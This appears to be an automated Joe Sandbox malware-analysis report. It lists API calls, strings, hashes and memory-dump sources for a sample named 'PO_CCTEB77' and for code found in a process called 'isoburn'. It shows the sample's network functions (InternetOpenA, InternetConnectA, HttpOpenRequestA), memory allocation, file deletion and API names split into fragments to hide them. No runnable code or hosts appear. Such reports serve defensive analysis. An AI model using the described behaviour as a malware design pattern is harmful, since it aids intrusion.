                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                            • API String ID: 0-871070163
                                                                            • Opcode ID: 64848161edede0f3b0920a12a3170c635fdf0fd5025e7d1c2c0a1177a3a8d204
                                                                            • Instruction ID: 2a6b5547382e8dd5671b6f128baf62e550ff5c0b196b2fcdb5ddf4e036526ede
                                                                            • Opcode Fuzzy Hash: 64848161edede0f3b0920a12a3170c635fdf0fd5025e7d1c2c0a1177a3a8d204
                                                                            • Instruction Fuzzy Hash: 2541EF757047029FD725DE29CC40B6BB7E5EF88720F100A1DEA5ADB780DB31EA058B92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0183728C
                                                                            Strings
                                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01837294
                                                                            • RTL: Re-Waiting, xrefs: 018372C1
                                                                            • RTL: Resource at %p, xrefs: 018372A3
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                            • API String ID: 885266447-605551621
                                                                            • Opcode ID: d21be346cb0d5bd6028d87543d7bc1121aad43e4f293f2fc3c9c2c8a904e2bd8
                                                                            • Instruction ID: ed92fbb63dfa0e1ed2f6179fa0a8805a4b7ab8e7428eeff3cb33e154d2dbd4c7
                                                                            • Opcode Fuzzy Hash: d21be346cb0d5bd6028d87543d7bc1121aad43e4f293f2fc3c9c2c8a904e2bd8
                                                                            • Instruction Fuzzy Hash: A7410072700206ABD721DE29CC41F6AB7A5FB94710F14061DFA56EB380DB21FA468BD2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: %%%u$]:%u
                                                                            • API String ID: 48624451-3050659472
                                                                            • Opcode ID: 6da0b573c8b91f187500dc9706b1cad7a506272a92995794456a39ec028d961c
                                                                            • Instruction ID: 35c947a2649003a344cb862fef56bce6aa2d2297e2fba8e1e628adc2669ff9cd
                                                                            • Opcode Fuzzy Hash: 6da0b573c8b91f187500dc9706b1cad7a506272a92995794456a39ec028d961c
                                                                            • Instruction Fuzzy Hash: 41315072A002199FDB20DE2DDC40BEEB7F9EB54710F44455AE949E3250EB30EB448BA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: __aulldvrm
                                                                            • String ID: +$-
                                                                            • API String ID: 1302938615-2137968064
                                                                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                            • Instruction ID: 5966eb2f6580f9a3246db030485abe0fc1c3c4881f6e8611d7c0b1169ad6ed5a
                                                                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                            • Instruction Fuzzy Hash: 3491A371E0021E9BEBA6DF6DCC806BEBBA5AF45720F14451EE995E72C0D730AF808711
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $$@
                                                                            • API String ID: 0-1194432280
                                                                            • Opcode ID: 5c9ea28a2027f3adc3c6028c8dc1c28b93365ae6956847dcb602f98879cb70c3
                                                                            • Instruction ID: 94ef4ab80c571b81d2e48de43f003d9d22f7b8394cc85481a43384fc3cd0289a
                                                                            • Opcode Fuzzy Hash: 5c9ea28a2027f3adc3c6028c8dc1c28b93365ae6956847dcb602f98879cb70c3
                                                                            • Instruction Fuzzy Hash: 3A811D72D002699BDB72CB54CC45BEEB7B5AB48714F0041DAEA19B7240E7705F84CFA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Execution Graph

                                                                            Execution Coverage:3%
                                                                            Dynamic/Decrypted Code Coverage:2.3%
                                                                            Signature Coverage:2.9%
                                                                            Total number of Nodes:954
                                                                            Total number of Limit Nodes:124

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $$'$,$,i$/$/a$1$2$8W$9$9$@F$DN$E$E$H$H%$L&$N$OW$P$Q$Rf$T$Ut$V$V>$YC$\1$\b$]$]$^$^C$`!$cF$h$ls$m$D$P$a\b
                                                                            • API String ID: 0-2954206845
                                                                            • Opcode ID: c5fc2a4bc53ce5512cacd767ed478470ea0ae4f03f775720f72837c43af1d0e2
                                                                            • Instruction ID: 4f8b4377f635f2a9f8d8f801796c0c888ee034a5f28ae63e2e9749c3fc1dc73c
                                                                            • Opcode Fuzzy Hash: c5fc2a4bc53ce5512cacd767ed478470ea0ae4f03f775720f72837c43af1d0e2
                                                                            • Instruction Fuzzy Hash: 2952AFB0E06629CBEB64CF45C9987DDBBB1BB45308F1081DAD40D6B291C7BA5A89CF44
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • FindFirstFileW.KERNELBASE(?,00000000), ref: 0301C364
                                                                            • FindNextFileW.KERNELBASE(00000000,00000010), ref: 0301C39F
                                                                            • FindClose.KERNELBASE(00000000), ref: 0301C3AA
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Find$File$CloseFirstNext
                                                                            • String ID:
                                                                            • API String ID: 3541575487-0
                                                                            • Opcode ID: e5a8113a24b97868ad254099b4ce76d3a16e60903e4235b5ab03e4c1fc8c4a56
                                                                            • Instruction ID: 0b5a09e3f1259420c4a5a00f5a5751675beb4e3ccd2cd990b6e663a832574efa
                                                                            • Opcode Fuzzy Hash: e5a8113a24b97868ad254099b4ce76d3a16e60903e4235b5ab03e4c1fc8c4a56
                                                                            • Instruction Fuzzy Hash: A8319275941308BBEB60DB64CC85FFF77BCAF84744F144558B948AB190DA70EA948BA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorMode
                                                                            • String ID: ,
                                                                            • API String ID: 2340568224-3772416878
                                                                            • Opcode ID: dd548d637da250e67812eecc5728c5fa8a883e6c5483b14cbb7e266c0dea2505
                                                                            • Instruction ID: 0d04d5939bfcf4f26d2fdd48f651d291e51264f4609c0ae1042c5c77b336852f
                                                                            • Opcode Fuzzy Hash: dd548d637da250e67812eecc5728c5fa8a883e6c5483b14cbb7e266c0dea2505
                                                                            • Instruction Fuzzy Hash: F1E1B1B5D02319ABDB29DFA0DC81FEFB7B8AF84304F044159E609A6141EB70A755CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 03024FD1
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: ac09151ae2de02c380c8794f522cbd0e2a3baa99de870694cad17f0140208203
                                                                            • Instruction ID: ef48759cd0ce8e6d094dc96b676f2cd0b3f3a6f54a5a32fe760f737288920696
                                                                            • Opcode Fuzzy Hash: ac09151ae2de02c380c8794f522cbd0e2a3baa99de870694cad17f0140208203
                                                                            • Instruction Fuzzy Hash: 1C21DCB6201649BFEB44DE98DC80EEB77ADAF8C714F008208FA1997240D670F8518BA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 030250F1
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            • Opcode ID: 9fe8c37de8c01f0ccb16eb15b2b9db5af8fd67254717c0140500df9b126258ef
                                                                            • Instruction ID: 2b60b0ece42122b28634f0a60c80ddd3789bbd2a7796270f19176fdbab62c427
                                                                            • Opcode Fuzzy Hash: 9fe8c37de8c01f0ccb16eb15b2b9db5af8fd67254717c0140500df9b126258ef
                                                                            • Instruction Fuzzy Hash: F621EFB6201609AFDB14DE98DC80EEB77EDAFCC714F04860CFA19A7240D670F8118BA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • NtAllocateVirtualMemory.NTDLL(03011A88,?,030121A9,00000000,00000004,00003000,00000004,00000000,030121A9,?,03011A88,030121A9,?), ref: 03025356
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateMemoryVirtual
                                                                            • String ID:
                                                                            • API String ID: 2167126740-0
                                                                            • Opcode ID: 3eabdd7af9bcf2049aa790797242d275fce47b0460ceb6be2fb30c3a51327ec2
                                                                            • Instruction ID: aba58904f2b05714fd882f147a7bfc6f9d317c61f46304e814f45dfe64ff8cbd
                                                                            • Opcode Fuzzy Hash: 3eabdd7af9bcf2049aa790797242d275fce47b0460ceb6be2fb30c3a51327ec2
                                                                            • Instruction Fuzzy Hash: 471113BA201649AFDB14DE98DC80EEB77ADEFC8710F008508FA5897281D670B9118BB5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: DeleteFile
                                                                            • String ID:
                                                                            • API String ID: 4033686569-0
                                                                            • Opcode ID: a676d15123d1633ce15ea626317f44c1822bff9036793ed6d774349b85bba25c
                                                                            • Instruction ID: 5a99900fc631ef7f475acd62617175c5ec299a4588c497ae0f7fbdbfbe13eb13
                                                                            • Opcode Fuzzy Hash: a676d15123d1633ce15ea626317f44c1822bff9036793ed6d774349b85bba25c
                                                                            • Instruction Fuzzy Hash: 78018B762027147EE220EA69CC40FEBB7ADDFC5721F408519FA589B281D770B90087A5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 030251B7
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID:
                                                                            • API String ID: 3535843008-0
                                                                            • Opcode ID: 95eb5ec58ed36a9217d741a15508274ea77d94a2defe0925d6dabe828dc0a160
                                                                            • Instruction ID: 1f053629f2219b5a7678fca33a2df4b9517492f3c0b2aec3d85b3a59808348d4
                                                                            • Opcode Fuzzy Hash: 95eb5ec58ed36a9217d741a15508274ea77d94a2defe0925d6dabe828dc0a160
                                                                            • Instruction Fuzzy Hash: 81E04F352117147BD120EA59CC00FD7B7ACEFC6711F408419FA48AB242C671790487F1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 342dcf0c302442dd65373a6667547caca20ce1aaf24b8b202c5c01350cc25b30
                                                                            • Instruction ID: 945231967dc61bafc61093a03ae7c9a1454f8ea7e4ffb209e2aec4109f3bfac8
                                                                            • Opcode Fuzzy Hash: 342dcf0c302442dd65373a6667547caca20ce1aaf24b8b202c5c01350cc25b30
                                                                            • Instruction Fuzzy Hash: A09002626015004255407158984444A7015DBE23013D5C115A15545A0C8718C9659379
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 846795fe0b596c3cfa70fecbc409e04967f459c6de8e63fb121de1fd4837f86b
                                                                            • Instruction ID: 2269fbc5838d5252834ec5b1dfa1021c46b870e1a9fd1991eb75f41c8e258c8b
                                                                            • Opcode Fuzzy Hash: 846795fe0b596c3cfa70fecbc409e04967f459c6de8e63fb121de1fd4837f86b
                                                                            • Instruction Fuzzy Hash: 5C90023260580012A540715898C458A5015DBE1301B95C011E1424594C8B14CA665371
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 87c21d124210f5ef82e433f68dbf3d66c0edb5949d5ca3782d02e5b70079a62c
                                                                            • Instruction ID: e1662a9089072eb5f009ad2a6b45c5c98a941978116c8b1f4d6d3d6eb1a368f9
                                                                            • Opcode Fuzzy Hash: 87c21d124210f5ef82e433f68dbf3d66c0edb5949d5ca3782d02e5b70079a62c
                                                                            • Instruction Fuzzy Hash: 4C90022A21340002E5807158A44864E1015CBD2202FD5D415A1015598CCA15C9795331
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 0622f2fef426d15b69fdec4b2ffb8700621dafb8d69aad77fc690fcb089bfd37
                                                                            • Instruction ID: 261ae397a2fca1df463c87cf3f795a5269f5e07ed419c12ee7e34608c771d90f
                                                                            • Opcode Fuzzy Hash: 0622f2fef426d15b69fdec4b2ffb8700621dafb8d69aad77fc690fcb089bfd37
                                                                            • Instruction Fuzzy Hash: 5890022230140003E5407158A45864A5015DBE2301F95D011E1414594CDA15C9665332
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 19ef0e55a89f7441c092e23a88d57a233190d200a82b4b3e4e1eff1400e84577
                                                                            • Instruction ID: ce9e1922be04f73b011dab38971aeaecdc1f17fac65e3ae2ded3497a3801370d
                                                                            • Opcode Fuzzy Hash: 19ef0e55a89f7441c092e23a88d57a233190d200a82b4b3e4e1eff1400e84577
                                                                            • Instruction Fuzzy Hash: 13900222242441526945B158944454B5016DBE12417D5C012A2414990C8626D966D731
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: d2f0eb655a7529b7bdab794076b56e430047b87e15afbafa7d5e4f6ebf356a86
                                                                            • Instruction ID: 1ceedab22f40127217626ce2c8d3fbd0eba854806723ab282897244b1915c8a7
                                                                            • Opcode Fuzzy Hash: d2f0eb655a7529b7bdab794076b56e430047b87e15afbafa7d5e4f6ebf356a86
                                                                            • Instruction Fuzzy Hash: 09900226221400021545B558564454F1455DBD73513D5C015F24165D0CC721C9755331
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: d4b0d0a523c87a853021db2253d2855af555cc8a1f01e2f9c8514f02cdc97af8
                                                                            • Instruction ID: 179a601dc04e3ba0ca39d160bf16c41c0aace015ab69755a85139d0cc85a08be
                                                                            • Opcode Fuzzy Hash: d4b0d0a523c87a853021db2253d2855af555cc8a1f01e2f9c8514f02cdc97af8
                                                                            • Instruction Fuzzy Hash: A190023260550402E5007158955474A2015CBD1201FA5C411A14245A8D8795CA6166B2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 543c482b3cf4d4b5d461c841b286755fc70cac08f0a1161a7982305e27d09689
                                                                            • Instruction ID: d1abb2f1e14dfbd61baf7a9806757fa4bde5bf06f3314c17aa482594b8a965ea
                                                                            • Opcode Fuzzy Hash: 543c482b3cf4d4b5d461c841b286755fc70cac08f0a1161a7982305e27d09689
                                                                            • Instruction Fuzzy Hash: 4D90022224545102E550715C944465A5015EBE1201F95C021A18145D4D8655C9656331
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 030258CA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: InternetOpen
                                                                            • String ID: A$ConnectA$Http$HttpOpenRequestA$InternetConnectA$InternetOpenA$Open$OpenRequestA$Requ$RequestA$ectA$estA$rnetConnectA$rnetOpenA
                                                                            • API String ID: 2038078732-2462375318
                                                                            • Opcode ID: 5452817714c2daa84cec4ce3d2a7dccd5e41ae751087edd5e33906131385f024
                                                                            • Instruction ID: 7f061c7322119ddd996b25d4b65f62f9a0d3c36bbcc5d93cfd196b11ab730295
                                                                            • Opcode Fuzzy Hash: 5452817714c2daa84cec4ce3d2a7dccd5e41ae751087edd5e33906131385f024
                                                                            • Instruction Fuzzy Hash: C3416D76A06258AFDB14DF98DC40DEFBBA9EF89710F148249FD58A7300C671AD108BE5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 697 30258db-30258dc 698 30258c3-30258d0 InternetOpenA 697->698 699 30258de-3025919 697->699 700 3025922-3025929 699->700 701 302591d call 3026280 699->701 702 3025952-3025958 700->702 703 302592b-3025951 InternetConnectA 700->703 701->700
                                                                            APIs
                                                                            • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 030258CA
                                                                            • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,?,?,?,?,?), ref: 0302594B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Internet$ConnectOpen
                                                                            • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA$rnetOpenA
                                                                            • API String ID: 2790792615-3717097293
                                                                            • Opcode ID: 2c9e0a23b4b540b81755fc3df40126a6364e31df89466c589fbc3fe3134dd704
                                                                            • Instruction ID: 6dace1c5e457f5d46a15acc597d59b0944faee30f2ff1b642aabf488a4aca011
                                                                            • Opcode Fuzzy Hash: 2c9e0a23b4b540b81755fc3df40126a6364e31df89466c589fbc3fe3134dd704
                                                                            • Instruction Fuzzy Hash: 21117CB1519158AFCB04CF98DD40DEBBBB8EB89310F04428DFD4CA7200C6759A118BA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,?,?,?,?,?), ref: 030259CB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: HttpOpenRequest
                                                                            • String ID: Http$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                                                            • API String ID: 1984915467-4071423757
                                                                            • Opcode ID: a53f010e68137af92daeea66d1fa971bd25edbc7885f1218b7d48149980b0e3c
                                                                            • Instruction ID: ce3fe68f864d9561ab752a309171c4ab60ee1a15b2c99a5326d4798bf1e4e061
                                                                            • Opcode Fuzzy Hash: a53f010e68137af92daeea66d1fa971bd25edbc7885f1218b7d48149980b0e3c
                                                                            • Instruction Fuzzy Hash: EB01EDB2505158AFCB04DF98D841DEF7BF9EB48210F158299FD48A7204D675AD10CBE1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,?,?,?,?,?), ref: 0302594B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ConnectInternet
                                                                            • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                                                            • API String ID: 3050416762-1024195942
                                                                            • Opcode ID: 09ee44c42201e152be619114b001354a29684353d5b5879cea72806e15ea9897
                                                                            • Instruction ID: 21a15e03e8040995fa788b911edacc78049e607a52cbe956ba65ae403ff46c85
                                                                            • Opcode Fuzzy Hash: 09ee44c42201e152be619114b001354a29684353d5b5879cea72806e15ea9897
                                                                            • Instruction Fuzzy Hash: 8701DBB2915158AFCB14DF99D941DEBBBB8EB48210F154299BE48A7240D670AE10CBE1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
